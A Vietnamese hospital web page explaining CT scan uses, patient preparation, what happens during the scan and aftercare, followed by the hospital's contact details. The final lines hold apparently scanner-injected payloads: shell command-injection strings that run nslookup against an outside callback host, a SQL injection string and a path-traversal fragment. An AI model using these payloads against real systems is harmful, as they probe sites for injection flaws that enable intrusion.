-------
Chụp CT là kỹ thuật chẩn đoán hình ảnh phổ biến hiện nay được sử dụng để
- Phát hiện ổ áp xe, dị dạng, khối u và các hình ảnh bệnh lý khác tại các bộ phận như mặt, đầu, cổ, ngực, tim, bụng, xương, khung chậu, cột sống, mô mềm ...
- Phát hiện ra các vấn đề bất thường liên quan đến chuyên khoa thần kinh sọ não như thiếu máu, chảy máu, phù não, khối u, khối máu tụ dập não,…
- Sử dụng để hướng dẫn xạ trị, phẫu thuật và theo dõi quá trình sau phẫu thuật. Đặc biệt, kỹ thuật chụp CT 3D còn cho phép các bác sĩ có sự đánh giá chính xác về vị trí bị tổn thương trong cơ thể người bệnh thông qua không gian 3 chiều để có được phác đồ điều trị phù hợp, định hướng tốt cho xạ trị cũng như phẫu thuật.
- Đối với các bệnh lý bất thường bẩm sinh, chụp cắt lớp vi tính có thể tái tạo hình ảnh 3D hỗ trợ các bác sĩ phẫu thuật tạo hình có được sự điều trị chính xác và tốt hơn.
- Các bác sĩ cũng có thể chỉ định bệnh nhân sử dụng phối hợp thuốc cản quang theo đường tĩnh mạch, đường tiêu hóa để làm rõ hình ảnh của một khối dị thường nào đó và đưa ra chẩn đoán chính xác nhất.
Quy trình thực hiện chụp CT
- Người bệnh sẽ được yêu cầu tháo bỏ toàn bộ các vật làm bằng kim loại trên người
- Phụ nữ nghi ngờ có thai hoặc đang có thai cần phải thông báo cho y tá để được cân nhắc và đưa ra lựa chọn phù hợp
- Trường hợp bệnh nhân có các bệnh như hen suyễn, tiểu đường, bệnh về tim, thận hoặc dị ứng thuốc thì cần phải thông báo trước cho bác sĩ.
- Nếu cần phải tiêm thuốc cản quang, bệnh nhân và người thân sẽ phải ký vào bản cam kết rồi mới được thực hiện.
- Người bệnh cần nhịn ăn trước giờ tiêm thuốc cản quang khoảng 4 - 6 tiếng và có thể uống một lượng nước vừa phải trước giờ chụp cắt lớp vi tính 2 giờ.
- Tùy vào vị trí cần chụp trên cơ thể mà người bệnh sẽ được yêu cầu cởi bỏ áo, quần và mặc áo của bệnh viện.
Trong khi chụp
- Chụp CT thường sẽ được thực hiện trong thời gian khoảng 3 - 5 phút, một số trường hợp đặc biệt hơn sẽ lên đến 15 - 45 phút và sẽ được các nhân viên y tế giải thích rõ ràng trước cho người bệnh.
- Trong khi chụp, người bệnh cần phải nằm yên. Bệnh nhân nên nín thở khi chụp bụng và ngực theo hướng dẫn của các nhân viên y tế.
- Bệnh nhân có chỉ định tiêm thuốc phản quang thường sẽ cảm thấy nóng vùng mặt, cổ, ngực, thậm chí có thể lan đến vùng bẹn chỉ trong vài giây.
- Đối với các bệnh nhân chụp cắt lớp vi tính kiểm tra hình ảnh đường tiêu hóa, có thể bác sĩ sẽ yêu cầu uống nước hoặc uống thuốc phản quang để tăng khả năng tương phản của các cấu trúc ống tiêu hóa, giúp cho việc chẩn đoán được tốt hơn.
Các lưu ý sau khi chụp
- Những người không phải uống thuốc cản quang thì khi chụp sẽ có thể ăn uống, hoạt động bình thường.
- Sau khi chụp, người bệnh có tiêm thuốc phản quang vẫn cần phải theo dõi trong phòng khoảng 30 phút, nếu không có bất cứ trường hợp bất thường nào diễn ra thì y tá sẽ tháo kim ra. Sau khi được tháo kim ra, người bệnh nên đè tay khoảng 5 - 10 phút vào vị trí tiêm thuốc để tránh chảy máu.
- Nếu sau khi chụp người bệnh xảy ra các dấu hiệu bất thường như buồn nôn, chóng mặt, nôn ói, khó thở, đỏ da, ngứa, sốt,… thì cần báo ngay với nhân viên y tế hoặc đưa đến các cơ sở y tế để thăm khám kịp thời.
-Người bệnh sẽ nhận được kết quả trong vòng 20 - 30 phút, trường hợp cần hội chẩn thì kết quả sẽ được trả lâu hơn.
Nếu có bất kỳ thắc mắc hay nhu cầu tư vấn về vấn đề trên, bạn có thể trực tiếp đến các cơ sở của Bệnh viện Đa khoa Ngọc Bích hoặc liên hệ vào số hotline 0228 6535 555 để được tư vấn cụ thể
IB hoặc alo 0228 65 35 555 để đặt lịch khám!
----------
Giờ làm việc : Tất cả các ngày trong tuần
-------------------------
Bệnh viện đa khoa Ngọc Bích : 505 giải phóng - TP Nam Định
0228 6535 555
phongkhamdakhoa108@ytevietnam.info
Tổng đài đặt khám: 0228 6535 555
&nslookup hitqcmweidtjdf73c4.bxss.me&'\"`0&nslookup hitqcmweidtjdf73c4.bxss.me&`'
$(nslookup hitcdblnotlkjf5f93.bxss.me||perl -e "gethostbyname('hitcdblnotlkjf5f93.bxss.me')")
../1
-1 OR 2+165-165-1=0+0+0+1 --
1
(nslookup hitypqvcobuzpab233.bxss.me||perl -e "gethostbyname('hitypqvcobuzpab233.bxss.me')")
1